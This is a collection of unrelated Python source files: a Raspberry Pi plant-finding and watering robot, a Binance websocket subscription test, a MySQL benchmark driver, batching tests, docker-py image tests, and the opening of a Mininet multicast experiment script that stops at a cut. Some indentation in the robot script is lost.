main.py
|
import client
import get_plant
import time
import RPi.GPIO as GPIO
import picamera
import math
import numpy as np
import argparse
import cv2
import json
import MPU9250
# GPIO setup
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(25, GPIO.OUT)
servo=GPIO.PWM(17, 100)
# Connect to the server and take possession of the motors.
c = client.create_client("test")
c.conn()
time.sleep(1)
c.send("take/9999999/motor1:1\n")
time.sleep(1)
c.send("take/9999999/odometry:1\n")
i = [0, 0, 0, 0]  # Latest odometry reading (four wheel encoder counts), updated in the background by update_pos().
last_time = time.time()
def update_pos():
"""Get odometry data and store the result in i.
"""
global i
while True:
msg = c.recv(10000)
try:
i = list(map(int, msg.rsplit(":", 1)[1].split(" ")))
        except (ValueError, IndexError):
            # Malformed message; skip it and wait for the next one.
            continue
time.sleep(0.25)
#set GPIO Pins
GPIO_TRIGGER = 23
GPIO_ECHO = 24
pos = [10, 10]  # Estimated robot position on the map, in centimeters.
#set GPIO direction (IN / OUT)
GPIO.setup(GPIO_TRIGGER, GPIO.OUT)
GPIO.setup(GPIO_ECHO, GPIO.IN)
def distance():
# set Trigger to HIGH
GPIO.output(GPIO_TRIGGER, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(GPIO_TRIGGER, False)
StartTime = time.time()
StopTime = time.time()
# save StartTime
while GPIO.input(GPIO_ECHO) == 0:
StartTime = time.time()
# save time of arrival
while GPIO.input(GPIO_ECHO) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
distance = (TimeElapsed * 34300) / 2
return distance
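# The busy-wait loops in distance() can hang forever if no echo ever arrives
# (e.g. nothing in range). A minimal sketch of a timeout-guarded variant, assuming
# the same GPIO_TRIGGER/GPIO_ECHO wiring; it is not called anywhere in this script:
def distance_with_timeout(timeout_s=0.05):
    GPIO.output(GPIO_TRIGGER, True)
    time.sleep(0.00001)
    GPIO.output(GPIO_TRIGGER, False)
    deadline = time.time() + timeout_s
    start = stop = time.time()
    while GPIO.input(GPIO_ECHO) == 0:
        start = time.time()
        if start > deadline:
            return None  # The echo pulse never started in time.
    while GPIO.input(GPIO_ECHO) == 1:
        stop = time.time()
        if stop > deadline:
            return None  # The echo pulse never ended in time.
    return (stop - start) * 34300 / 2  # Same speed-of-sound conversion as above.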
import threading
a = threading.Thread(target=update_pos)
a.start()
def get_angle():
    """Average 400 magnetometer readings from the MPU9250 into a heading in radians.
    """
    xs = []
    ys = []
    for _ in range(400):
        data = mpu.readMagnet()
        # A (0, 0) reading means no fresh sample is available yet; retry.
        while (data["x"] == 0 and data["y"] == 0):
            time.sleep(0.01)
            data = mpu.readMagnet()
        # Hard-iron offset and scale calibration (constants measured for this unit).
        data["x"] -= 39.66
        data["x"] /= 24.47
        data["y"] -= 2.8675
        data["y"] /= 23.84
        xs.append(data["x"])
        ys.append(data["y"])
        time.sleep(0.015)
    # Average as a vector (atan2 of the summed components) so that readings near
    # the ±pi wraparound do not cancel out, unlike a naive mean of the angles.
    return math.atan2(sum(ys), sum(xs))
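# get_pos below averages each side's pair of encoder counts: indices 1 and 2 are
# assumed to be the left wheels and indices 0 and 3 the right wheels, matching how
# move() uses the returned (left, right) pair.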
def get_pos(vals):
return (vals[1] + vals[2]) / 2, (vals[0] + vals[3]) / 2
def move(dist, to_left=1, to_right=1):
    """Drive dist encoder units forward, balancing both sides; stop early near obstacles.
    """
    dist /= 0.90  # Empirical distance correction factor.
vals = list(i)
left, right = get_pos(vals)
left_init = left
right_init = right
end_left = left + dist
end_right = right + dist
last_left, last_right = left, right
    sl = 120  # Left motor speed (PWM value).
    sr = 120  # Right motor speed (PWM value).
    cu_l = 0  # Cumulative encoder progress, left side.
    cu_r = 0  # Cumulative encoder progress, right side.
    distance_obj_cm = 3000  # Distance to the nearest obstacle; start beyond sensor range.
    # Run until the requested distance is covered or an obstacle is nearby.
    while distance_obj_cm > 55 and (left < end_left or right < end_right):
old_sl = sl
old_sr = sr
cur_left, cur_right = get_pos(i)
dl = cur_left - last_left
dr = cur_right - last_right
cu_l += dl
cu_r += dr
        # Ratios of cumulative progress, used to rebalance the motor speeds.
        # The +0.1 avoids division by zero before the encoders start counting.
        ratio = (cu_l + 0.1) / (cu_r + 0.1)
        ratio2 = (cu_r + 0.1) / (cu_l + 0.1)
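        # Speed matching: scale up the side that has fallen behind (or scale down
        # the leading side once both speeds are already high); the results are
        # clamped to the [100, 170] PWM range just below.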
if cu_l < cu_r:
if sl < 125 or sr < 125:
sl *= ratio2
else:
sr /= ratio2
elif cu_l > cu_r:
if sr < 125 or sl < 125:
sr *= ratio
else:
sl /= ratio
if sl < 100:
sl = 100
if sr < 100:
sr = 100
if sl > 170:
sl = 170
if sr > 170:
sr = 170
# Send data to the arduino.
c.sendtoserial("motor1", int(sr) * to_left)
c.sendtoserial("motor2", int(sl) * to_right)
c.sendtoserial("motor3", int(sl) * to_right)
c.sendtoserial("motor4", int(sr) * to_left)
left, right = cur_left, cur_right
last_left, last_right = cur_left, cur_right
distance_obj_cm = distance()
print("DIST: ", distance_obj_cm)
time.sleep(0.25)
c.sendtoserial("motor1", "0")
c.sendtoserial("motor2", "0")
c.sendtoserial("motor3", "0")
c.sendtoserial("motor4", "0")
time.sleep(0.5)
if distance_obj_cm < 60:
return (1, left - left_init)
return (0, left - left_init)
def move_centimeter(cm):
    """Move cm centimeters forward, recalibrating the heading every meter.
    """
    global init_angle, pos, tunny_right
    unit_per_cm = 290 / 71 / 2 / 1.44  # Encoder units per centimeter (empirical calibration).
ret = []
while cm > 0.1:
cur = min(cm, 100)
cm -= cur
ret = move(unit_per_cm * cur)
if ret[0] == 1:
break
angle = get_angle()
old_angle = init_angle
init_angle = angle
turn(get_angle_diff(angle, old_angle)[1])
time.sleep(1)
if tunny_right == 1:
pos[1] += ret[1] / unit_per_cm
else:
pos[0] += ret[1] / unit_per_cm
    if ret[0] == 1:
        # An obstacle stopped the move: record it ~50 cm ahead along the travel axis.
        if tunny_right:
            found_obstacle(pos[0], pos[1] + 50)
        else:
            found_obstacle(pos[0] + 50, pos[1])
print(ret[1] / unit_per_cm)
def iset_servo_angle(angle_idx):
"""Set the servomotor angle to -90, -45, 0, 45 or 90 degrees.
"""
vals = [5, 9, 13, 17, 21]
servo.start(vals[angle_idx])
time.sleep(1.5)
servo.start(0)
mpu=MPU9250.MPU9250()
def get_angle_diff(angle1, angle2):
"""Return the angle, between 0 and 2*pi, between angle1 and angle2.
"""
diff = angle2 - angle1
while diff < -3.1415:
diff += 3.1415*2
while diff > 3.1415:
diff -= 3.1415*2
return abs(diff), diff
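# Worked examples: get_angle_diff(0.1, 3.1) gives diff = 3.0, already inside
# (-pi, pi], so it returns (3.0, 3.0); get_angle_diff(3.1, -3.1) gives diff = -6.2,
# normalised to about +0.08, i.e. the short way around the ±pi wraparound.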
def turn(rad, first=True):
"""Turn until reaching rad angles difference from the current direction.
"""
global init_angle
target_angle = init_angle + rad
while target_angle > 3.1415:
target_angle -= 3.1415 * 2
while target_angle < -3.1415:
target_angle += 3.1415 * 2
rad *= -1
left_val = -1 if rad > 0 else 1
right_val = -left_val
c.sendtoserial("motor1", str(160 * left_val))
c.sendtoserial("motor2", str(160 * right_val))
c.sendtoserial("motor3", str(160 * right_val))
c.sendtoserial("motor4", str(160 * left_val))
time.sleep(abs(rad) / 2 + 0.1)
c.sendtoserial("motor1", "0")
c.sendtoserial("motor2", "0")
c.sendtoserial("motor3", "0")
c.sendtoserial("motor4", "0")
time.sleep(0.2)
angle = get_angle()
diff, dir = get_angle_diff(angle, target_angle)
if diff > 0.05:
time.sleep(0.1)
init_angle = angle
turn(dir, False)
if first:
init_angle=target_angle
time.sleep(0.5)
def overwrite_mapinit(x, y):
map_data = []
f_size = 4.5
print("x: " + str(x))
print("y: " + str(y))
with open('fetch/map.capture_init', 'r+') as map_file:
f_size = float(map_file.readline())
print(str(f_size))
map_data = list(map_file.read().replace('\n', ''))
n = y * f_size * 900 + x * f_size
for j in range(0, 60):
for i in range(0, 60):
map_data[int(900 * j + i + n)] = 'P'
with open('fetch/map.capture_init', 'w+') as f:
f.write(str(f_size) + "\n")
map_str = ''.join(map_data)
f.write(map_str)
def process_image(image_path):
name = image_path
source_image = cv2.imread(name)
average_color_per_row = np.average(source_image, axis=0)
average_color = np.average(average_color_per_row, axis=0)
average_color = np.uint8(average_color)
print(average_color)
    # 100x100 preview swatch of the average colour (not used further).
    average_color_img = np.array([[average_color] * 100] * 100, np.uint8)
return average_color
nb_photo = 0
camera = picamera.PiCamera()
camera.rotation = 90
camera.contrast = 60
def found_obstacle(x, y):
global nb_photo
    camera.capture("fetch/pics/photo_" + str(nb_photo) + ".jpg")
    is_plant = get_plant.get_plant("fetch/pics/photo_" + str(nb_photo) + ".jpg")
if is_plant:
# Water the plant
GPIO.output(25, True)
time.sleep(2)
GPIO.output(25, False)
print("True")
# Write data in data_json
try:
with open("fetch/data_json", "rt") as file:
data = json.load(file)
except IOError:
data = {}
if 'plants' not in data:
data['plants'] = []
        str_pos = str(int(x)) + ',' + str(int(y))
data['plants'].append({
'position' : str_pos,
'to_water' : '0',
'picture_path': "../fetch/pics/photo_" + str(nb_photo) + ".jpg"
})
with open("fetch/data_json", "wt") as outfile:
json.dump(data, outfile)
# Write data in map.capture_init
overwrite_mapinit(int(x), int(y))
else:
print("FALSE")
nb_photo += 1
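# Main routine: record the initial heading, drive 1 m, make a quarter turn, then
# drive 1 m along the new heading, photographing (and watering) anything that
# blocks the path on the way.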
init_angle = get_angle()
tunny_right = 0
move_centimeter(100)
time.sleep(2)
turn(-3.14/2)
tunny_right = 1
move_centimeter(100)
|
dev_test_dex_subscribe.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_dex_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
            print(oldest_stream_data_from_stream_buffer)
# create instance of BinanceWebSocketApiManager for Binance Chain DEX
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.org")
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BNB_USDSB-1AC', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
stream_id = binance_websocket_api_manager.create_stream(["kline_1m"], markets)
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
channels = ['kline_5m', 'kline_15m']
binance_websocket_api_manager.subscribe_to_stream(stream_id,
channels=['kline_1m', 'kline_5m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'])
binance_websocket_api_manager.unsubscribe_from_stream(stream_id,
channels=['kline_1m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'],
markets=markets)
binance_websocket_api_manager.get_stream_subscriptions(stream_id)
while True:
#binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.print_stream_info(stream_id)
time.sleep(1)
|
mysql.py
|
import queue
import traceback
from threading import Thread
import pymysql
from common import util
class IDEBenchDriver:
def init(self, options, schema, driver_arg):
self.time_of_latest_request = 0
self.isRunning = False
self.requests = queue.LifoQueue()
# mysql properties
print("mysql initialization")
print("mysql db name: %s" % driver_arg['db'])
print("mysql table name: %s" % driver_arg['table'])
self.host = driver_arg['host']
self.port = driver_arg['port']
self.user = driver_arg['user']
self.password = driver_arg['password']
self.db = driver_arg['db']
self.table = driver_arg['table']
self.table_to_replace = driver_arg['table-to-replace']
def execute_vizrequest(self, viz_request, options, schema, result_queue):
print("processsing...")
viz = viz_request.viz
sql_statement = viz.get_computed_filter_as_sql(schema)
# make table name the same as mysql table
sql_statement = sql_statement.replace(self.table_to_replace, self.table)
print(sql_statement)
cursor = self.conn.cursor()
viz_request.start_time = util.get_current_ms_time()
cursor.execute(sql_statement)
# data = cursor.fetchall()
viz_request.end_time = util.get_current_ms_time()
print('query time: '+str(viz_request.end_time-viz_request.start_time))
cursor.close()
# results = {}
# for row in data:
# keys = []
# for i, bin_desc in enumerate(viz.binning):
#
# if "width" in bin_desc:
# bin_width = bin_desc["width"]
# keys.append(str(int(row[i])))
# else:
# keys.append(str(row[i]))
#
# key = ",".join(keys)
# results[key] = row[len(viz.binning):]
#
# viz_request.result = results
# write an empty result to the viz_request
viz_request.result = {}
# notify IDEBench that processing is done by writing it to the result buffer
result_queue.put(viz_request)
def process_request(self, viz_request, options, schema, result_queue):
self.requests.put((viz_request, options, schema, result_queue))
def process(self):
while self.isRunning:
try:
request = self.requests.get(timeout=1)
viz_request = request[0]
options = request[1]
schema = request[2]
result_queue = request[3]
# only execute requests that are newer than the last one we processed (drops old/no longer needed queries)
if viz_request.expected_start_time < self.time_of_latest_request:
viz_request.dropped = True
result_queue.put(viz_request)
continue
self.time_of_latest_request = viz_request.expected_start_time
self.execute_vizrequest(viz_request, options, schema, result_queue)
except queue.Empty as e:
# ignore queue-empty exceptions
print('requests queue empty.')
except Exception as e:
traceback.print_exc()
                # pymysql raised an error; re-establish the connection.
                self.conn.close()
                self.conn = pymysql.connect(host=self.host, port=int(self.port), user=self.user, password=self.password, database=self.db)
def workflow_start(self):
self.isRunning = True
self.time_of_latest_request = 0
# connection
self.conn = pymysql.connect(host=self.host, port=int(self.port), user=self.user, password=self.password, database=self.db)
thread = Thread(target=self.process)
thread.start()
def workflow_end(self):
self.isRunning = False
# close connection when done
# self.conn.close()
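# A usage sketch implied by the methods above (IDEBench normally instantiates and
# drives this class itself; options, schema and the viz requests come from the
# harness, and the connection settings below are placeholders):
#
#   driver = IDEBenchDriver()
#   driver.init(options, schema, {'host': 'localhost', 'port': 3306,
#                                 'user': 'root', 'password': 'secret',
#                                 'db': 'idebench', 'table': 'flights',
#                                 'table-to-replace': 'df'})
#   driver.workflow_start()   # opens the connection and starts the worker thread
#   driver.process_request(viz_request, options, schema, result_queue)
#   driver.workflow_end()     # stops the worker loop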
|
dynamic_batching_test.py
|
# Copyright 2021 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import threading as td
import time
from cortex_internal.lib.api.utils import DynamicBatcher
class Handler:
def handle_post(self, payload):
time.sleep(0.2)
return payload
def test_dynamic_batching_while_hitting_max_batch_size():
max_batch_size = 32
dynamic_batcher = DynamicBatcher(
Handler(),
method_name="handle_post",
max_batch_size=max_batch_size,
batch_interval=0.1,
test_mode=True,
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.process(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(128):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(60)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
raise TimeoutError("thread", thread.getName(), "got stuck")
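    # Payloads are drawn from a shared 1..n counter, so if every request was
    # processed exactly once, the collected results must sum to n * (n + 1) / 2.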
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the max batch size
assert len(set(batch_lengths)) == 1
assert max_batch_size in batch_lengths
def test_dynamic_batching_while_hitting_max_interval():
max_batch_size = 32
dynamic_batcher = DynamicBatcher(
Handler(),
method_name="handle_post",
max_batch_size=max_batch_size,
batch_interval=1.0,
test_mode=True,
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.process(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(2):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(30)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
raise TimeoutError("thread", thread.getName(), "got stuck")
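    # Same n * (n + 1) / 2 identity as in the previous test: it verifies that no
    # request was lost or duplicated.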
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the number of running threads
assert len(set(batch_lengths)) == 1
assert len(running_threads) in batch_lengths
|
api_image_test.py
|
import contextlib
import json
import shutil
import socket
import tarfile
import tempfile
import threading
import pytest
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
import docker
from ..helpers import requires_api_version, requires_experimental
from .base import BaseAPIIntegrationTest, BUSYBOX
class ListImagesTest(BaseAPIIntegrationTest):
def test_images(self):
res1 = self.client.images(all=True)
assert 'Id' in res1[0]
res10 = res1[0]
assert 'Created' in res10
assert 'RepoTags' in res10
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
assert len(distinct) == self.client.info()['Images']
def test_images_quiet(self):
res1 = self.client.images(quiet=True)
assert type(res1[0]) == six.text_type
class PullImageTest(BaseAPIIntegrationTest):
def test_pull(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world', tag='latest')
self.tmp_imgs.append('hello-world')
assert type(res) == six.text_type
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
def test_pull_streaming(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull(
'hello-world', tag='latest', stream=True, decode=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
assert isinstance(chunk, dict)
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
@requires_api_version('1.32')
@requires_experimental(until=None)
def test_pull_invalid_platform(self):
with pytest.raises(docker.errors.APIError) as excinfo:
self.client.pull('hello-world', platform='foobar')
assert excinfo.value.status_code == 500
assert 'invalid platform' in excinfo.exconly()
class CommitTest(BaseAPIIntegrationTest):
def test_commit(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(id)
assert 'ContainerConfig' in img
assert 'Image' in img['ContainerConfig']
assert BUSYBOX == img['ContainerConfig']['Image']
busybox_id = self.client.inspect_image(BUSYBOX)['Id']
assert 'Parent' in img
assert img['Parent'] == busybox_id
def test_commit_with_changes(self):
cid = self.client.create_container(BUSYBOX, ['touch', '/test'])
self.tmp_containers.append(cid)
self.client.start(cid)
img_id = self.client.commit(
cid, changes=['EXPOSE 8000', 'CMD ["bash"]']
)
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(cid['Id'])
assert '8000/tcp' in img['Config']['ExposedPorts']
assert img['Config']['Cmd'] == ['bash']
class RemoveImageTest(BaseAPIIntegrationTest):
def test_remove(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
logs = self.client.remove_image(img_id, force=True)
assert {"Deleted": img_id} in logs
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
assert len(res) == 0
class ImportImageTest(BaseAPIIntegrationTest):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile(delete=False) as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
def test_import_from_bytes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_file(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_stream(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_image_from_data_with_changes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
def test_import_image_with_changes(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
statuses = self.client.import_image(
src=tar_filename, repository='test/import-from-file',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
# Docs say output is available in 1.23, but this test fails on 1.12.0
@requires_api_version('1.24')
def test_get_load_image(self):
test_img = 'hello-world:latest'
self.client.pull(test_img)
data = self.client.get_image(test_img)
assert data
output = self.client.load_image(data)
assert any([
line for line in output
if 'Loaded image: {}'.format(test_img) in line.get('stream', '')
])
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
        thread.daemon = True
thread.start()
yield 'http://%s:%s' % (socket.gethostname(), server.server_address[1])
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def test_import_from_url(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
tar_size = 10240
with self.dummy_tar_stream(n_bytes=tar_size) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
@requires_api_version('1.25')
class PruneImagesTest(BaseAPIIntegrationTest):
def test_prune_images(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
# Ensure busybox does not get pruned
ctnr = self.client.create_container(BUSYBOX, ['sleep', '9999'])
self.tmp_containers.append(ctnr)
self.client.pull('hello-world', tag='latest')
self.tmp_imgs.append('hello-world')
img_id = self.client.inspect_image('hello-world')['Id']
result = self.client.prune_images()
assert img_id not in [
img.get('Deleted') for img in result.get('ImagesDeleted') or []
]
result = self.client.prune_images({'dangling': False})
assert result['SpaceReclaimed'] > 0
assert 'hello-world:latest' in [
img.get('Untagged') for img in result['ImagesDeleted']
]
assert img_id in [
img.get('Deleted') for img in result['ImagesDeleted']
]
class SaveLoadImagesTest(BaseAPIIntegrationTest):
@requires_api_version('1.23')
def test_get_image_load_image(self):
with tempfile.TemporaryFile() as f:
stream = self.client.get_image(BUSYBOX)
for chunk in stream:
f.write(chunk)
f.seek(0)
result = self.client.load_image(f.read())
success = False
result_line = 'Loaded image: {}\n'.format(BUSYBOX)
for data in result:
print(data)
if 'stream' in data:
if data['stream'] == result_line:
success = True
break
assert success is True
@requires_api_version('1.30')
class InspectDistributionTest(BaseAPIIntegrationTest):
def test_inspect_distribution(self):
data = self.client.inspect_distribution('busybox:latest')
assert data is not None
assert 'Platforms' in data
assert {'os': 'linux', 'architecture': 'amd64'} in data['Platforms']
|
mininet_multicast_dynamic.py
|
#!/usr/bin/env python
from groupflow_shared import *
from mininet.net import *
from mininet.node import OVSSwitch, UserSwitch
from mininet.link import TCLink
from mininet.log import setLogLevel
from mininet.cli import CLI
from mininet.node import Node, RemoteController
from scipy.stats import truncnorm
from numpy.random import randint, uniform
from subprocess import *
import sys
import signal
from time import sleep, time
from datetime import datetime
from multiprocessing import Process, Pipe
import numpy as np
import traceback
import os.path
# Hardcoded purely for testing / debug, these will be moved once functionality is stable
ARRIVAL_RATE = 5 * (1.0 / 60)
SERVICE_RATE = 1.0 / 60
TRIAL_DURATION_SECONDS = 60.0 * 3
RECEIVERS_AT_TRIAL_START = 5
STATS_RECORDING_INTERVAL = 5
MEDIA_DURATION_SECONDS = 72
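# With Poisson receiver arrivals at ARRIVAL_RATE and exponentially distributed
# holding times at SERVICE_RATE, the steady-state mean number of receivers per
# group is ARRIVAL_RATE / SERVICE_RATE = 5 (an M/M/inf queue), which presumably
# motivates RECEIVERS_AT_TRIAL_START = 5 above.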
def mcastTestDynamic(topo, hosts = [], log_file_name = 'test_log.log', replacement_mode='none', link_weight_type = 'linear', number_of_groups = 30, pipe = None):
test_groups = []
test_success = True
# First, check if the log file already exists, and stop the test if it does
# (This is primarily in place to allow continuing an interrupted trial set by running the same console command)
if os.path.isfile(log_file_name):
print 'Skipping trial, log file already exists: ' + str(log_file_name)
if pipe is not None:
